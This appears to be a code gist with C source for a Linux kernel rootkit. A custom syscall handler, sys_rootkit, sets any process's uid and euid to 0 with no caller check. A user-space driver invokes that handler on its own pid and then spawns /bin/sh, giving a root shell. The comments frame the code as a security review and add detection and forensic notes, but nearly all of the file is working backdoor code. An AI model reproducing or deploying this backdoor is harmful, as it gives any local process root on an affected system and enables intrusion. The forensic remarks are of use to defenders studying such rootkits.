
@tariqadel
Created August 6, 2009 11:38
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/unistd.h>
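/*
 * Thin wrapper around the non-standard syscall number __NR_rootkit.
 * That number is not defined by stock kernel headers; this file only
 * builds and runs against a kernel tree that was rebuilt with the extra
 * sys_rootkit entry, which is the real indicator of compromise here.
 */
#define rootkit(x, y) syscall(__NR_rootkit, (x), (y))

/*
 * User-space driver for the sys_rootkit handler shown on this page.
 *
 * Invokes the custom syscall on its own pid, prints the result, and then
 * replaces itself with /bin/sh. Whether that shell runs with uid 0
 * depends entirely on the kernel-side handler; this program holds no
 * privilege of its own. For detection, the observable effect is a
 * process whose uid changes without a setuid exec or a set*uid() call.
 *
 * Returns 1 if execve() fails; does not return otherwise.
 */
int main(void)
{
	/* syscall() returns long, so keep it as long and print it with %ld. */
	long rc = rootkit(1, getpid());
	char *cmd[] = { "/bin/sh", NULL };

	printf("Exit code = %ld\n\n", rc);

	/* The shell is started regardless of rc, as in the original. */
	execve(cmd[0], cmd, NULL);

	/* execve() only returns on failure; report it instead of falling off main. */
	perror("execve");
	return 1;
}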
#include "rootkit.h"
/* Number of times print_info() has run; used only to label each dump. */
int pc = 0;

/*
 * Log the identity of the calling task (current) to the kernel log.
 *
 * Prints the uid/euid/suid fields read straight from the task structure,
 * then the values reported by sys_getuid(), sys_geteuid() and
 * sys_getpid(). Always returns 0.
 *
 * NOTE(review): reading uid fields directly off the task structure
 * implies an older kernel layout -- confirm against the target tree.
 * The printk calls carry no explicit log level, and the fixed
 * "*** ---[ Printing" banner is a searchable artifact in the kernel log.
 */
int print_info(void)
{
	/* Snapshot the ids first so the logged values are those seen on entry. */
	int real_uid = current->uid;
	int eff_uid = current->euid;
	int saved_uid = current->suid;

	pc += 1;
	printk("\n *** ---[ Printing %d ] *** \n", pc);

	/* Fields as stored on the task. */
	printk("uid = %d ", real_uid);
	printk("euid = %d ", eff_uid);
	printk("suid = %d ", saved_uid);

	/* Same identity as reported through the regular syscall handlers. */
	printk("getuid() = %d ", (int) sys_getuid());
	printk("geteuid() = %d ", (int) sys_geteuid());
	printk("getpid() = %d ", (int) sys_getpid());

	return 0;
}
/*
 * sys_rootkit - custom syscall handler that rewrites a task's uid and euid.
 *
 * @mode:  accepted but never read in this function.
 * @mypid: pid of the task whose ids are overwritten.
 *
 * Looks the task up with find_task_by_pid() and, if it exists, sets its
 * uid and euid to 0. Returns 0 on success and -1 when no task matches.
 *
 * Security review: nothing in this function checks who the caller is or
 * what privilege it holds before the write, so any process able to issue
 * this syscall number can change the ids of any pid. That is the backdoor.
 * It exists only in a kernel rebuilt with this entry, so comparing the
 * running kernel and its syscall table against a known-good build is the
 * primary check.
 *
 * Forensic notes grounded in the code below:
 *  - only uid and euid are written; suid keeps its old value, so an
 *    affected task that started unprivileged shows uid=euid=0 with a
 *    non-zero suid;
 *  - every call emits "find_task_by_pid(<pid>)!" plus two print_info()
 *    dumps to the kernel log.
 */
asmlinkage int sys_rootkit(int mode, pid_t mypid) {
struct task_struct *ts;
int rc=0; // result returned to the caller: 0 on success, -1 if the pid was not found
// print_info() reports on current (the caller), not on ts, so this
// before/after pair only shows the change when mypid is the caller's pid.
print_info();
printk("find_task_by_pid(%d)!\n", mypid);
ts = find_task_by_pid(mypid);
if(ts) {
// Unconditional write: no ownership, capability or mode check precedes it.
ts->uid = (uid_t)0;
ts->euid = (uid_t)0;
} else {
// No task with that pid.
rc = -1;
}
print_info();
return(rc);
}
#ifndef __LINUX_ROOTKIT_H
#define __LINUX_ROOTKIT_H
#include <linux/linkage.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/syscalls.h>
#include <linux/sys.h>
#endif